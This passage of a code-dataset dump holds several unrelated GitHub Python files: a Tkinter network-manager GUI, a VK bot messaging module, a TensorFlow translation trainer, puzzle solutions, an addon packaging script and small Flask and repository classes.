Frame(root, bg='white', bd=2, relief=RAISED)\n\nlbl = Label(fr, text='transparence : ', bg='white', font=('Helvetica 10 bold'))\nlbl.grid(row=1, column=0, padx=10, pady=10)\n\nw = Spinbox(fr, from_=0, to=10, bg='white', font=('Helvetica 10 bold'))\nw.grid(row=1, column=1, pady=10)\nframe_principal = Frame(root, bg=\"#bdbdbd\")\nframe_principal.grid(column=1, row=0, sticky=\"n\")\n# row length \n\n#fr.grid_rowconfigure(2, weight=0)\n\nbtn = Button(fr, text= 'appliquer', command=lambda:[get()], font=('Helvetica 10 bold'), relief=FLAT)\nbtn.grid(row=1, column=2, padx=10, pady=10)\n\nbq = Button(fr, text=\"Quitter\", font=(\"Helvetica 10 bold\"), relief=FLAT, fg='red', command=lambda:[dim(0.95), wait(), dim(0.90), wait(), dim(0.85), wait(), dim(0.80), wait(), dim(0.75), wait(), dim(0.70), wait(), dim(0.65), wait(), dim(0.60), wait(), dim(0.55), wait(), dim(0.50), wait(), dim(0.45), wait(), dim(0.40), wait(), dim(0.35), wait(), dim(0.30), wait(), dim(0.25), wait(), dim(0.20), wait(), dim(0.15), wait(), dim(0.10), wait(), dim(0.5), wait(), dim(0), ferm()])\nbq.grid(row=4, column=2)\nroot.bind(\"\", show)\n\nlbl2 = Label(fr, text=\"Thémes : \", font=(\"Helvetica 10 bold\"), bg=\"white\")\nlbl2.grid(column=0, row=2, sticky='w', padx=13)\nbtn.bind(\"\", btn_bind)\nbtn.bind(\"\", 
btn_leave)\n\n#colors####################################\nmyfr = Frame(fr)\nmyfr.grid(column=1, row=2, )\n\nlac = Label(myfr, text=\" \", bg='yellow')\nlac.grid(column=0, row=0, sticky='w', pady=5, padx=5)\n\nlac1 = Label(myfr, text=\" \", bg='#263238')\nlac1.grid(column=1, row=0, sticky='w', pady=5, padx=5)\n\nlac3 = Label(myfr, text=\" \", bg='grey')\nlac3.grid(column=2, row=0, sticky='w', pady=5, padx=5)\n\nlac4 = Label(myfr, text=\" \", bg='white')\nlac4.grid(column=3, row=0, sticky='w', pady=5, padx=5)\n\n##################################################\"\"\nlac.bind(\"\", bxes)\nlac.bind(\"\", bxes_l)\nlac3.bind(\"\", bxes1)\nlac3.bind(\"\", bxes_l1)\nlac4.bind(\"\", bxes2)\nlac4.bind(\"\", bxes_l2)\n\nlac.bind(\"\", jaune)\nlac1.bind(\"\", rouge)\nlac3.bind('', gris)\nlac4.bind('', blanc)\n\n#img = ImageTk.PhotoImage(Image.open(\"C:/Users/Tijan/Desktop/Text-file-to-handwritten-pdf-file-master/Text-file-to-handwritten-pdf-file-master/my3.ico\"))\n#ytb = Label(fr, image=img, height=50, width=50)\n#ytb.grid(row=7, column=0)\nlbb = Label(root, text='cacher')\nbtn_principal = Button(fr2, text=\"General\", font=('Helvetica'), relief=FLAT, bg='#bdbdbd', width=10, height=4)\nbtn_principal.grid(row=0, column=0, sticky='n')\n#butttons\nbut1 = Button(fr2, text=\"🛠\\n Réglages\", command=show_button, font=('Arial'), relief=FLAT, bg='#5c6bc0', height=4, width=10)\nbut1.grid(row=1, column=0, sticky='n')\nbut_2 = Button(fr2, text='🔑', relief=FLAT, font=('Helvetica'), bg='#4db6ac', command=show2, width=10, height=4)\nbut_2.grid(row=2, column=0, sticky='n')\nbut_3 = Button(fr2, text='🔊', relief=FLAT, font=('Helvetica'), bg='#ff8a65', command=show2, width=10, height=4)\nbut_3.grid(row=3, column=0, sticky='n')\nbut_4 = Button(fr2, text='🎲', relief=FLAT, font=('Helvetica'), bg='#f48fb1', command=show2, width=10, height=4)\nbut_4.grid(row=4, column=0, sticky='n')\n\nbtn_principal.bind(\"\", show_principal)\nbtn_principal.bind(\"\", bpenter)\nbtn_principal.bind(\"\", bpleave)\nbut1.bind(\"\", overfl)\nbut1.bind(\"\", overfl_leave)\nbut_2.bind(\"\", overfl2)\nbut_2.bind(\"\", overfl_leave2)\nbut_3.bind(\"\", overfl3)\nbut_3.bind(\"\", overfl_leave3)\nbut_4.bind(\"\", overfl4)\nbut_4.bind(\"\", overfl_leave4)\nl = Label(frame_principal, text=\"Adresse IP : \", font=('Helvetica 10 bold'))\nl.grid(column=0, row=0,sticky='n', pady=10, padx=10)\ne = Entry(frame_principal, width=20, font=(\"Cambria 12 bold\"))\ne.grid(column=1, row=0, sticky='n', pady=10)\nb = Button(frame_principal, text=\"Scanner\", font=('Helvetica 10 bold'), relief=FLAT, command=scan)\nb.grid(row=0, column=2, sticky='n', pady=10, padx=10)\nbutto = Button(frame_principal, text='reduire', command=root.iconify)\n\ntext = Text(frame_principal, height=50, width=53, wrap=WORD, font=('Helvetica 11 bold'), fg='#4caf50', bg='black')\ntext.grid(row=1, column=0, columnspan=4)\ne.bind(\"\", entrer)\n\nroot.mainloop()","repo_name":"Tijan-Infogeeks/Tij-tech","sub_path":"NetworkManager.py","file_name":"NetworkManager.py","file_ext":"py","file_size_in_byte":8948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"18298798874","text":"\"\"\"\nФункции отвечающие за отправку сообщений\n\"\"\"\nfrom vk_api.utils import get_random_id\nfrom vk_api.upload import VkUpload\nimport vk_api\nfrom time import sleep\nfrom threading import Thread\nimport urllib\nfrom random import choice\nfrom string import ascii_lowercase\nimport os.path\nfrom os import path\nimport requests\nimport re\n\n\ndef 
_send_message(vk, id, message, sleep_time=5, keyboard=None, attachment=None):\n \"\"\"\n имитирует typing, отправляет сообщение через sleep_time\n Проверяет на блок\n \"\"\"\n try:\n if id > 0:\n vk.messages.setActivity(user_id=id, type=\"typing\")\n if keyboard is None:\n keys = None\n else:\n keys = keyboard.get_keyboard()\n sleep(sleep_time)\n\n vk.messages.send(\n user_id=id,\n random_id=get_random_id(),\n keyboard=keys,\n message=message,\n attachment=attachment\n )\n\n except vk_api.exceptions.ApiError as e:\n print(e)\n\n\ndef load_image(url):\n random_name = \"tmp/\" + ''.join(choice(ascii_lowercase) for i in range(12)) + url[-4:]\n if not path.exists('tmp'):\n os.mkdir('tmp')\n urllib.request.urlretrieve(url, random_name)\n return random_name\n\n\ndef get_flag_url(country):\n result = requests.get('https://geo.koltyrin.ru/country.php?country=' + country)\n s = result.content\n res = re.findall(r'img\\/country\\/\\d+flag\\.png\"\\s+alt=', s.decode(\"utf-8\"))\n res = res[0][0:-6]\n return \"https://geo.koltyrin.ru/\" + res\n\n\ndef get_map_url(country):\n result = requests.get('https://geo.koltyrin.ru/country.php?country=' + country)\n s = result.content\n res = re.findall(r'img\\/country\\/\\d+globe\\.png\"\\s+alt=', s.decode(\"utf-8\"))\n res = res[0][0:-6]\n return \"https://geo.koltyrin.ru/\" + res\n\n\ndef send_message(kwargs):\n \"\"\"\n Обертка для _send_message, выполняется в потоке, не блогирует цикл\n send_message({\"vk\": vk, \"id\": vk_id, \"message\": \"da\", \"sleep_time\": 0, \"keyboard\": None, \"attachment\": None})\n \"\"\"\n Thread(target=_send_message, kwargs=kwargs, name=\"Message sender\").start()\n\n\ndef _send_photo_path(vk, id, text, photo_path, delete=True, keyboard=None):\n upload = VkUpload(vk)\n uploaded = upload.photo_messages(photo_path)\n if path.exists(photo_path) and delete:\n os.remove(photo_path)\n photo = 'photo' + str(uploaded[0]['owner_id']) + '_' + str(uploaded[0]['id'])\n send_message({\"vk\": vk, \"id\": id, \"message\": text, \"sleep_time\": 0, \"attachment\": photo, \"keyboard\": keyboard})\n\ndef _send_photo_paths(vk, id, text, photo_paths, delete=True, keyboard=None):\n upload = VkUpload(vk)\n photo = ''\n for photo_path in photo_paths:\n uploaded = upload.photo_messages(photo_path)\n if path.exists(photo_path) and delete:\n os.remove(photo_path)\n photo = photo+',photo' + str(uploaded[0]['owner_id']) + '_' + str(uploaded[0]['id'])\n send_message({\"vk\": vk, \"id\": id, \"message\": text, \"sleep_time\": 0, \"attachment\": photo[1:], \"keyboard\": keyboard})\n\n\ndef _send_photo_url(vk, id, text, url, delete=True, keyboard=None):\n path = load_image(url)\n send_photo_path(vk, id, text, path, delete, keyboard)\n\ndef _send_photo_urls(vk, id, text, urls, delete=True, keyboard=None):\n paths = []\n for url in urls:\n path = load_image(url)\n paths.append(path)\n send_photo_paths(vk, id, text, paths, delete, keyboard)\n\ndef send_text(vk, id, text, keyboard=None):\n send_message({\"vk\": vk, \"id\": id, \"message\": text, \"sleep_time\": 0, \"keyboard\": keyboard})\n\n\ndef send_photo_path(vk, id, text, path, delete, keyboard=None):\n kwargs = {\"vk\": vk, \"id\": id, \"text\": text, \"photo_path\": path, \"delete\": delete, \"keyboard\": keyboard}\n Thread(target=_send_photo_path, kwargs=kwargs, name=\"Photo path sender\").start()\n\ndef send_photo_paths(vk, id, text, paths, delete, keyboard=None):\n kwargs = {\"vk\": vk, \"id\": id, \"text\": text, \"photo_paths\": paths, \"delete\": delete, \"keyboard\": keyboard}\n 
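# fire-and-forget: the worker thread keeps the caller responsive while photos upload\n 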
Thread(target=_send_photo_paths, kwargs=kwargs, name=\"Photo path sender\").start()\n\ndef send_photo_url(vk, id, text, url, delete, keyboard=None):\n kwargs = {\"vk\": vk, \"id\": id, \"text\": text, \"url\": url, \"delete\": delete, \"keyboard\": keyboard}\n Thread(target=_send_photo_url, kwargs=kwargs, name=\"Photo url sender\").start()\n\ndef send_photo_urls(vk, id, text, urls, delete, keyboard=None):\n kwargs = {\"vk\": vk, \"id\": id, \"text\": text, \"urls\": urls, \"delete\": delete, \"keyboard\": keyboard}\n Thread(target=_send_photo_urls, kwargs=kwargs, name=\"Photo url sender\").start()\n","repo_name":"stepoleggg/geo","sub_path":"message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":4738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38362876573","text":"# Import all required Python frameworks.\nfrom classes.data_preparation import DataPreparation\nfrom classes.encoder import Encoder\nfrom classes.decoder import Decoder\nimport tensorflow as tf\nimport tensorflow_addons as tfa\nfrom tqdm import tqdm\nimport os\nimport numpy\n# I check if i can run the model in GPU for faster training\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \ntf.config.list_physical_devices(\"GPU\")\nif tf.config.list_physical_devices(\"GPU\"):\n print(\"The model will use the GPU !!!\")\nelse:\n print(\"The model will use the CPU !!!\")\n\nEPOCHS = 4\nSENTENCE_PAIRS = 30000\nBATCH_SIZE = 64\nDATAPATH = \"datasets\"\nDATAFILE = \"fra.txt\"\nEMBEDDING_DIM = 256\nENCODER_DIM, DECODER_DIM = 1024, 1024\nSTEPS_PER_EPOCH = SENTENCE_PAIRS // BATCH_SIZE\noptimizer = tf.keras.optimizers.Adam()\ntrain_accuracy = tf.keras.metrics.Mean(name=\"train_accuracy\")\ntest_accuracy = train_accuracy\ndata_preparation = DataPreparation(DATAPATH, DATAFILE, SENTENCE_PAIRS, BATCH_SIZE)\ntrain_dataset = data_preparation.train_dataset\nexample_input_batch, example_target_batch = next(iter(train_dataset))\nexample_input_batch.shape, example_target_batch.shape\nmax_length_input = example_input_batch.shape[1]\nmax_length_output = example_target_batch.shape[1]\nvocab_inp_size = data_preparation.english_vocabulary_size + 1\nvocab_tar_size = data_preparation.french_vocabulary_size + 1\nencoder = Encoder(vocab_inp_size, EMBEDDING_DIM, ENCODER_DIM, BATCH_SIZE)\n# If we want to run the decoder with LuongAttention mechanism we must add in attention_type the string luong\ndecoder = Decoder(vocab_tar_size, EMBEDDING_DIM, DECODER_DIM, BATCH_SIZE, max_length_input, max_length_output, attention_type=\"bahdanau\")\n\ncheckpoint_path = \"./checkpoints/\"\nckpt = tf.train.Checkpoint(optimizer=optimizer, encoder=encoder, decoder=decoder)\nckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5)\n# if a checkpoint exists, restore the latest checkpoint.\nif ckpt_manager.latest_checkpoint:\n ckpt.restore(ckpt_manager.latest_checkpoint)\n print(\"Latest checkpoint restored!!\")\n\n\ndef loss_function(real, pred):\n cross_entropy = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=\"none\")\n loss = cross_entropy(y_true=real, y_pred=pred)\n mask = tf.logical_not(tf.math.equal(real, 0)) # output 0 for y=0 else output 1\n mask = tf.cast(mask, dtype=loss.dtype)\n loss = mask * loss\n loss = tf.reduce_mean(loss)\n return loss\n\n\ndef accuracy_function(real, pred, flag=True):\n accuracies = tf.equal(real, tf.argmax(pred, axis=2, output_type=\"int32\") if flag == True else pred)\n mask = tf.math.logical_not(tf.math.equal(real, 0))\n 
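# drop padding positions (token id 0) so they do not count toward the accuracy\n 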
accuracies = tf.math.logical_and(mask, accuracies)\n accuracies = tf.cast(accuracies, dtype=tf.float32)\n mask = tf.cast(mask, dtype=tf.float32)\n return tf.reduce_sum(accuracies) / tf.reduce_sum(mask)\n\n\n@tf.function\ndef train_step(inp, targ, enc_hidden):\n loss = 0\n with tf.GradientTape() as tape:\n enc_output, enc_h, enc_c = encoder(inp, enc_hidden)\n dec_input = targ[:, :-1] # Ignore EOS token\n real = targ[:, 1:] # ignore BOS token\n # Set the AttentionMechanism object with encoder_outputs\n decoder.attention_mechanism.setup_memory(enc_output)\n # Create AttentionWrapperState as initial_state for decoder\n decoder_initial_state = decoder.build_initial_state(BATCH_SIZE, [enc_h, enc_c], tf.float32)\n pred = decoder(dec_input, decoder_initial_state)\n logits = pred.rnn_output\n loss = loss_function(real, logits)\n variables = encoder.trainable_variables + decoder.trainable_variables\n gradients = tape.gradient(loss, variables)\n optimizer.apply_gradients(zip(gradients, variables))\n train_accuracy(accuracy_function(real, logits, flag=True))\n return loss\n\nprint(f\"==================== TRAINING PROCESS (EPOCHS= {EPOCHS} , NUMBER OF SENTENCES FOR TRAINING = {int(SENTENCE_PAIRS * 0.8)}) ====================\")\nfor epoch in tqdm(range(EPOCHS)):\n enc_hidden = encoder.initialize_hidden_state()\n total_loss = 0\n train_accuracy.reset_states()\n for (batch, (inp, targ)) in enumerate(train_dataset.take(STEPS_PER_EPOCH)):\n batch_loss = train_step(inp, targ, enc_hidden)\n total_loss += batch_loss\n if (epoch + 1) % 5 == 0:\n ckpt_save_path = ckpt_manager.save()\n print(\"Epoch {} Loss {:.4f}\".format(epoch + 1, total_loss / STEPS_PER_EPOCH), f\"Accuracy {train_accuracy.result():.4f}\")\n\n\n\ndef testing_process(en_input):\n inference_batch_size = en_input.shape[0]\n enc_start_state = [tf.zeros((inference_batch_size, ENCODER_DIM)), tf.zeros((inference_batch_size, ENCODER_DIM))]\n enc_out, enc_h, enc_c = encoder(en_input, enc_start_state)\n start_tokens = tf.fill([inference_batch_size], data_preparation.french_tokenizer_word_index[\"BOS\"])\n end_token = data_preparation.french_tokenizer_word_index[\"EOS\"]\n greedy_sampler = tfa.seq2seq.GreedyEmbeddingSampler()\n decoder_instance = tfa.seq2seq.BasicDecoder(cell=decoder.rnn_cell, sampler=greedy_sampler, output_layer=decoder.fc)\n decoder.attention_mechanism.setup_memory(enc_out)\n decoder_initial_state = decoder.build_initial_state(inference_batch_size, [enc_h, enc_c], tf.float32)\n decoder_embedding_matrix = decoder.embedding.variables[0]\n outputs, _, _ = decoder_instance(decoder_embedding_matrix, start_tokens=start_tokens, end_token=end_token, initial_state=decoder_initial_state)\n return outputs.sample_id.numpy()[0]\n\nprint(f\"==================== TEST PROCESS ====================\")\npredicted_list = []\ninput_english = data_preparation.input_tensor_val[:20]\ntarget_fr = numpy.array(data_preparation.target_tensor_val[:20])\nfor en_input in tqdm(input_english, desc=\"TESTING PROCESS !!!\"):\n en_input = numpy.array([en_input])\n r = testing_process(en_input)\n predicted_list.append(r)\npadding_predicted_list = tf.keras.preprocessing.sequence.pad_sequences(predicted_list, padding=\"post\", maxlen=max_length_output)\ntarget_fr = tf.convert_to_tensor(target_fr)\nscore = test_accuracy(accuracy_function(target_fr, padding_predicted_list, flag=False))\ntf.print(f\"TEST ACCURACY : {score:.4f}\")\n","repo_name":"Kontosoros/Deep-Learning","sub_path":"WORD LEVEL MACHINE 
TRANSLATION/thema_3/word_level_machine_translation_part_3.py","file_name":"word_level_machine_translation_part_3.py","file_ext":"py","file_size_in_byte":6157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26418300107","text":"def recursive_check(num_to_split: int):\r\n num_b = int(get_four_mask(str(num_to_split)))\r\n num_a = num_to_split - num_b\r\n return num_a, num_b\r\n\r\n\r\ndef contains_digit_four(num: int):\r\n for char in str(num):\r\n if char == '4':\r\n return True\r\n return False\r\n\r\n\r\ndef get_four_mask(s: str):\r\n mask = list(s)\r\n for i in range(0, s.__len__()):\r\n if s[i] == '4':\r\n mask[i] = '1'\r\n else:\r\n mask[i] = '0'\r\n return \"\".join(mask)\r\n\r\n\r\nif __name__ == '__main__':\r\n # input() reads a string with a line of input, stripping the ' ' (newline) at the end.\r\n # This is all you need for most Code Jam problems.\r\n n_cases = int(input()) # read a line with a single integer\r\n for i in range(1, n_cases + 1):\r\n target_num = [int(s) for s in input().split(\" \")] # read a list of integers, 2 in this case\r\n num_a, num_b = recursive_check(target_num[0])\r\n print(\"Case #{}: {} {}\".format(i, num_a, num_b))\r\n # check out .format's specification for more formatting options\r\n","repo_name":"juansalmeronmoya/codejam2019","sub_path":"codejam_1.py","file_name":"codejam_1.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26556727572","text":"from functools import reduce\nfrom math import sqrt\nfrom utils import primes_up_to\n\nlim = 51\nrows = [[1]]\n\nfor i in range(lim - 1):\n\tprev = rows[i]\n\tsubseq = []\n\tfor j in range(len(prev) + 1):\n\t\tif j in (0, len(prev)):\n\t\t\tsubseq.append(1)\n\t\telse:\n\t\t\tsubseq.append(prev[j-1] + prev[j])\n\trows.append(subseq)\n\nnums = reduce(lambda x,y: x.union(y), rows, set())\nprimes, pset = primes_up_to(int(sqrt(max(nums))) + 1)\nsqrs = [p**2 for p in primes]\n\nsqrfreesum = 0\n\nfor n in nums:\n\tsqr = False\n\tfor s in sqrs:\n\t\tif n % s == 0:\n\t\t\tsqr = True\n\t\t\tbreak\n\tif not sqr:\n\t\tsqrfreesum += n\n\nprint(sqrfreesum)\n","repo_name":"taylordohmen/ProjectEuler","sub_path":"Euler203.py","file_name":"Euler203.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15419223815","text":"import shutil\nfrom pathlib import Path\n\nInterface = \"100100\"\nInterfaceWrath = \"30401\"\nInterfaceClassic = \"11403\"\nDIPPKG_PATH = Path(\"G:\\Dev\\DBM-VoicePack\\zip-files\")\nADDON_path = Path(\"G:\\Dev\\DBM-VoicePack\")\n\ndef replace_keys(key_to_var, filepath: Path):\n # Opening our text file in read only\n # mode using the open() function\n with open(filepath, 'r') as file:\n # Reading the content of the file\n # using the read() function and storing\n # them in a new variable\n data = file.read()\n\n # Searching and replacing the text\n # using the replace() function\n for key, val in key_to_var.items():\n data = data.replace(key, val)\n\n # Opening our text file in write only\n # mode to write the replaced content\n with open(filepath, 'w') as file:\n\n # Writing the replaced data in our\n # text file\n file.write(data)\n\n # Printing Text replaced\n print(\"Text replaced\")\n\ndef package_addon(addon_name:str, version:str):\n\n key_to_var = {}\n key_to_var[\"INTERFACE_KEY\"] = Interface\n key_to_var[\"INTERFACECLASSIC_KEY\"] = 
InterfaceClassic\n key_to_var[\"INTERFACEWARTH_KEY\"] = InterfaceWrath\n key_to_var[\"VERSION_KEY\"] = version\n\n src = ADDON_path / addon_name\n dest = DIPPKG_PATH / addon_name / addon_name\n if dest.exists():\n shutil.rmtree(dest)\n shutil.copytree(src, dest)\n\n files = []\n files.append(addon_name+\".toc\")\n files.append(addon_name+\"_Vanilla.toc\")\n files.append(addon_name+\"_Wrath.toc\")\n for file in files:\n toc_file = Path(dest / file)\n replace_keys(key_to_var, toc_file)\n\n zippath = Path( DIPPKG_PATH / (addon_name + \"_multi\" + \"_v\" + version) )\n shutil.make_archive(zippath, 'zip', DIPPKG_PATH / addon_name )\n shutil.rmtree(DIPPKG_PATH / addon_name)\n\npackage_addon(\"DBM-VPEnglishFemale\", \"0.1.2\")\npackage_addon(\"DBM-VPFrenchFemale\", \"0.2.9\")\npackage_addon(\"DBM-VPEnglishMale\", \"0.1.2\")\npackage_addon(\"DBM-VPFrenchMale\", \"0.1.2\")","repo_name":"acharnoz/DBM-VoicePack-FrenchFemale","sub_path":"scripts/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"7746036397","text":"from sortedcontainers import SortedDict\nclass Solution:\n def minMalwareSpread(self, graph, initial) -> int:\n '''\n Solved on my own; approach:\n Use DFS to find the connected components of the graph; any component that contains an infected node gets fully infected.\n For each component (a set), subtract the initially infected set initial to get diff:\n 1. len(tree) == len(diff): the component contains no infected node, ignore it.\n 2. len(tree) == len(diff) + 1: the component contains exactly one infected node,\n so removing that node's malware saves len(tree) nodes from infection.\n 3. len(tree) > len(diff) + 1: the component contains several infected nodes;\n after removing the malware from any one node, rerun the infect method (dfs) on the remaining subgraph to count how many nodes still get infected.\n Store a dict whose key is the number of nodes saved and whose value holds the removed node indices.\n Finally return the smallest node index among those with the largest key.\n '''\n n = len(graph)\n left = [i for i in range(n)]\n forest = []\n tree = []\n\n def dfs(v:int):\n inx = left.index(v)\n left.pop(inx)\n tree.append(v)\n for i in range(n):\n if v != i and graph[v][i] == 1:\n if i in left:\n dfs(i)\n \n def infect(v:int, w:int, infected):\n if v not in infected:\n infected.append(v)\n for i in range(n):\n if i not in (v, w) and graph[v][i] == 1:\n if i not in infected:\n infect(i, w, infected)\n\n\n while left:\n dfs(left[0])\n forest.append(set(tree))\n tree = []\n \n iset = set(initial)\n intes = SortedDict()\n for tree in forest:\n sub = tree - iset\n if len(tree) - len(sub) > 0:\n vset = tree - sub\n if len(vset) == 1:\n if len(tree) in intes.keys():\n intes[len(tree)].extend(vset)\n else:\n intes[len(tree)] = list(vset)\n else:\n for i in vset:\n infected = []\n for left in vset:\n if left != i:\n infect(left, i, infected)\n val = len(tree) - len(infected)\n if val in intes.keys():\n intes[val].append(i)\n else:\n intes[val] = [i]\n maxkey = max(intes.keys())\n return min(intes[maxkey])\n \nif __name__ == \"__main__\":\n sol = Solution()\n graph, initial = [[1,1,0],[1,1,0],[0,0,1]], [0,1]\n graph, initial = [[1,1,0],[1,1,1],[0,1,1]], [0,1]\n graph, initial = [[1,1,0,0],[1,1,1,0],[0,1,1,1],[0,0,1,1]], [0,1]\n print(sol.minMalwareSpread(graph, initial))","repo_name":"David-5-5/tutorial","sub_path":"python/algo/leecode/algo928.py","file_name":"algo928.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"22867900986","text":"class Solution:\n def longestCommonSubsequence(self, text1: str, text2: str) -> int:\n if not text1 or not text2:\n return 0\n if text1 == text2:\n return len(text1)\n len_1 = len(text1)\n len_2 = len(text2)\n matrix = [[0 for _ in range(len_2)] for j in range(len_1)]\n for k in range(len_2):\n if text1[:0 + 1] in 
text2[:k + 1]:\n matrix[0][k] += 1\n i = 0\n for i in range(1, len_1):\n for j in range(len_2):\n\n if text1[:i + 1][-1] == text2[:j + 1][-1]:\n try:\n lst = matrix[i-1][:j] + [0]\n except:\n lst = 0\n matrix[i][j] += (1 + max(lst))\n else:\n lst = []\n if 0 <= i - 1 < len_1:\n lst.append(matrix[i - 1][j])\n if 0 <= j - 1 < len_1:\n lst.append(matrix[i][j - 1])\n matrix[i][j] = max(lst)\n return max(matrix[i])\n\n\n\n\"\"\"TESTS\n1)Runtime 1351 ms\nBeats 35.25%\nMemory 22.8 MB\nBeats 43.63%\n2)Runtime 1343 ms\nBeats 35.73%\nMemory 22.8 MB\nBeats 43.63%\"\"\"","repo_name":"BenitoSwaggolini/Leetcode_tasks","sub_path":"medium/1143. Longest Common Subsequence/r.py","file_name":"r.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"37240993312","text":"# How to get deeply located item\n\ndata = [3, 5, 7, [9, 11]]\n# We need to print \"11\"\n\nelement = data[3][1]\nprint(element)\n\n# [3] gets the fourth item in data,\n# which is a list [9, 11]\n\n# [1] gets the second item in that\n# list [9, 11], that is \"11\"","repo_name":"ash/amazing_python3","sub_path":"307-deep-index-list.py","file_name":"307-deep-index-list.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"48"} +{"seq_id":"2136210802","text":"from flask import render_template, request, url_for, session\nfrom sqlalchemy.sql import and_\nfrom Ostrich import app\nfrom Ostrich import models\n\n\n@app.route('/')\ndef index():\n feed=models.User.query.all()\n return render_template(\"index.html\", name=\"___\", feed=feed)\n\n@app.route('/posted', methods=[\"GET\",\"POST\"])\ndef posted():\n name = request.form['name']\n location = request.form['location']\n course = request.form['course']\n shirt = request.form['shirt']\n new_post = models.User(name, location, course, shirt)\n models.db.session.add(new_post)\n models.db.session.commit()\n feed=models.User.query.all()\n session['idNum'] = new_post.id\n return render_template(\"logged_in.html\", name=name, feed=feed)\n\n\n@app.route('/logged_out')\ndef logged_out():\n idNum = session.get('idNum', None)\n user = models.User.query.filter_by(id=idNum).first()\n models.db.session.delete(user)\n models.db.session.commit()\n feed = models.User.query.all()\n return render_template(\"index.html\", feed=feed, idNum=idNum)\n\n@app.route('/filterLocation', methods=[\"GET\", \"POST\"])\ndef filterLocation():\n location = request.form['location']\n filteredFeed = models.User.query.filter_by(location=location).all()\n return render_template(\"index.html\", feed=filteredFeed)\n\n@app.route('/filterCourse', methods=[\"GET\", \"POST\"])\ndef filterCourse():\n course = request.form['course']\n filteredFeed = models.User.query.filter_by(course=course).all()\n return render_template(\"index.html\", feed=filteredFeed)\n\n\n","repo_name":"leonliang0395/SturdyBirdy","sub_path":"Ostrich/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70274053265","text":"from entities.purchase import Purchase\nfrom db_connection import get_database_connection\n\n\ndef get_purchase_by_row(row):\n return Purchase(\n row['budget_id'],\n row['category'],\n row['amount'],\n row['username'],\n row['comment'],\n row['p_id']\n ) if row else None\n\n\nclass PurchaseRepository:\n '''Class of the purchase-repository\n 
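\n Attributes:\n _connection: database connection object used by all queries\n 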
'''\n\n def __init__(self, connection):\n '''class constructor\n\n Args:\n connection: database connection object\n\n '''\n self._connection = connection\n\n def fetch_all(self):\n '''Returns all purchases\n Returns:\n list of Purchase-objects\n '''\n cursor = self._connection.cursor()\n cursor.execute('select * from purchases')\n rows = cursor.fetchall()\n\n return list(map(get_purchase_by_row, rows))\n\n def find_by_username(self, username):\n '''Finds purchase based on username\n\n Args:\n username: the user the search is based on\n\n Returns:\n The list of purchases as Purchase-objects if in existance, otherwhise None\n\n '''\n\n all_purchases = self.fetch_all()\n new = filter(\n lambda purchase: purchase and purchase.username == username,\n all_purchases\n )\n return list(new)\n\n def find_by_category(self, category, username):\n '''Finds purchase based on category and username\n Args:\n category:\n username:\n Returns:\n Purchase-objects in list\n '''\n\n user_purchases = self.find_by_username(username)\n categorized = filter(\n lambda purchase: purchase and purchase.category == category,\n user_purchases\n )\n return list(categorized)\n\n def find_by_id(self, p_id):\n '''Finds a specific purchase based on id\n\n Args:\n p_id: string, the purchase id\n\n Returns:\n Purchase object\n '''\n\n cursor = self._connection.cursor()\n cursor.execute('select * from purchases where p_id=?', (p_id,))\n rows = cursor.fetchall()\n\n return list(map(get_purchase_by_row, rows))[0]\n\n def add_purchase(self, purchase):\n '''Saves a purchase in the purchase-database\n Args:\n purchase: Purchase-object that will be saved\n\n '''\n\n cursor = self._connection.cursor()\n\n cursor.execute(\n '''insert into purchases\n (p_id,category,amount,username,comment,budget_id) values (?,?,?,?,?,?)''',\n (purchase.id,\n purchase.category,\n purchase.amount,\n purchase.username,\n purchase.comment,\n purchase.budget_id)\n )\n self._connection.commit()\n\n return purchase\n\n def delete_one(self, p_id):\n '''Deletes specific purchase\n\n Args:\n p_id: id of the deleted purchase\n\n '''\n\n cursor = self._connection.cursor()\n cursor.execute('delete from purchases where p_id = ?', (p_id,))\n self._connection.commit()\n\n def delete_all(self):\n '''Deletes all purchases\n '''\n\n cursor = self._connection.cursor()\n cursor.execute('delete from purchases')\n self._connection.commit()\n\n\npurchase_repository = PurchaseRepository(get_database_connection())\n","repo_name":"NaND3R5/ot-harjoitustyo","sub_path":"budgetapp/src/databases/purchase_repository.py","file_name":"purchase_repository.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41132519475","text":"#!/usr/bin/python3\n\"\"\" Module that implements the url resources for our flask app \"\"\"\nimport os\nfrom flask import request\nfrom flasgger.utils import swag_from\nfrom flask_restful import Resource\nfrom models.auth_module import authenticate\n\nfrom models.api_users import APIUsers\nfrom models.text_query import TextQuery\nfrom models.image_query import ImageQuery\nfrom analysis_engines.text_engine import TextEngine\nfrom analysis_engines.image_engine import ImageEngine\nfrom models.base_query import BaseClass\n\nuser_key = BaseClass()\n\n\nclass TextAnalysisResource(Resource):\n \"\"\" This Class implements the TextAnalysis URL resource \"\"\"\n \n @authenticate\n @swag_from(os.path.join(os.path.dirname(__file__), 'swagger.yml'))\n def post(self):\n 
